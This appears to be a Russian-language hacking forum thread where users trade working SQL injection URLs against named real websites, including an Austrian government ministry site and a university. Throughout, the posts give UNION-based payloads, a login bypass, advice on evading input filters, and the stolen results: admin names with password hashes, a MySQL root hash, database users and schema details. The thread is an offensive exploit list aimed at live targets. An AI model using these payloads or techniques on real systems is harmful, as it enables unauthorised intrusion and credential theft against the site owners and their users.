old.lipstick.ru Сначало логинимся лоин и пасс 'Or 1=1/* ПОтом идём сюда Code: http://old.lipstick.ru/smscenter.php?view=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a, password),6,7+FROM+users+LIMIT+0,1/* admin:399a2ece6b34ff6e314d87301af489f0 Версия 4 В админку не попасть, проблема с хэдэрами
Code: http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* Чего-то дальше не крутится...(
Там фильтруются входящие данные пробуй AES_DECRYPT AES_ENCRYPT http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),15/*
Code: http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/* root:*DE342DA364B639606FF4447B24338C1318FB181C:pseudo
Code: http://www.bmeia.gv.at/robots.txt админка:_https://cms.bmeia.gv.at/truman/index.php3 логин/пароль не катят...
http://www.aziendeinvista.it/ Code: http://www.aziendeinvista.it/view_news.asp?id=-1+union+select+1,concat_ws(0x3a,Passw,Admin),3,4,5,6,7+from+admin-- http://www.tissuper.com.au/ Code: http://www.tissuper.com.au/newsline/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admin_user)--
Code: http://www2.umaine.edu/graduate/article.php?id=-999'+union+select+1,version(),user(),4/* version() - 4.1.20 user() - jwef@localhost
www.avem.fr Code: http://www.avem.fr/news?id=-0303+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.0.25-standard-log:[email protected]:avemlfod
2 Tyc00n Попробуй этот запрос: Code: http://www2.umaine.edu/graduate/article.php?id=-999'+UNION+SELECT+1,concat(username,0x3a,password),3,4+from+users+limit+0,1/*
Code: http://www.neurope.eu/view_news.php?id=-1+union+select+1,USER(),VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,DATABASE(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/* neweuro_kostas@localhost 4.1.22-standard neweuro_corporate
Code: http://wap.freesoft.ru/get_file.wap.wml?id=99999'+UNION+SELECT+1,2,3,4,5/* get@localhost:get:4.1.14
http://www.starww.com/ Code: http://www.starww.com/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(UserPass+as+nvarchar)+from+AccountMaster)--
atlas.cz Не знаю - было или нет... Доступ из нужных - только к Zabava Code: http://wap.atlas.cz/tv.asp?id=-99+UNION+SELECT+name,2+from+master..sysdatabases--
http://www.athletesadvance.com/ Code: http://www.athletesadvance.com/sample_profile.asp?view_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins+where+admin_id=1)--
http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15+from+information_schema.tables/* Далее пользуемся лимитом P.S. Интересные таблички - useradmin, member, PROFILING
HTML: http://www.salienagolf.lv/?pane=nxt&lang=1&gid=22&n=1+union+select+0,convert(concat(USER(),VERSION(),DATABASE())+using+latin1),2,3,4,5,6,7,8,9,10,11,12/* USER:salienagolfcom@localhost VERSION:4.1.18 DATABASE:salienagolfcom
http://www.fllandforsale.biz/email_rep.php?id=4/*' http://www.fllandforsale.biz/email_rep.php?id=4+and+1=1/*' http://www.fllandforsale.biz/email_rep.php?id=4+order+by+22/*' http://fllandforsale.biz/searchRegions.php?pType=3/* http://fllandforsale.biz/searchRegions.php?pType=3+and+1=1/* http://fllandforsale.biz/searchRegions.php?pType=3+order+by+1/* http://fllandforsale.biz/showListing.php?type=property&id=348+and+1/* http://fllandforsale.biz/showListing.php?type=property&id=348+order+by+4/* http://www.fllandforsale.biz/email_rep.php?id=-4+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,0,11,12,13,14,15,16,17,18,19,20,21,22 4.1.20::h7t6Y54@localhost::flland p.s. версия 4-ка и легким брутом таблици не подобрал, читать тоже прав нет http://www.epdlp.com/clasica.php?id=397+and+1=1/*' http://www.epdlp.com/clasica.php?id=397+order+by+14/*' http://www.epdlp.com/clasica.php?id=397+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*' http://www.epdlp.com/clasica.php?id=397+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14/*' 5.0.45::[email protected]::epdlp http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=''+limit+100,11/*' clasica::top100 clasica:bra clasica::nommusico clasica::apemusico clasica::fecha http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name='clasica'+limit+1,4/*' texto::apeautor http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_schema,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name+like+'%mail%'+limit+1,2/*' http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_schema,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name='felicitaciones'/*' felicitaciones epdlp::felicitaciones::comentario epdlp::felicitaciones::ID epdlp::felicitaciones::anio epdlp::felicitaciones::mes epdlp::felicitaciones::fecha epdlp::felicitaciones::dia epdlp::felicitaciones::hora epdlp::felicitaciones::email epdlp::felicitaciones::contenido p.s. версия 5-ка таблиц много можете поискать что-то)) /*прав читать файлы нет =\*/
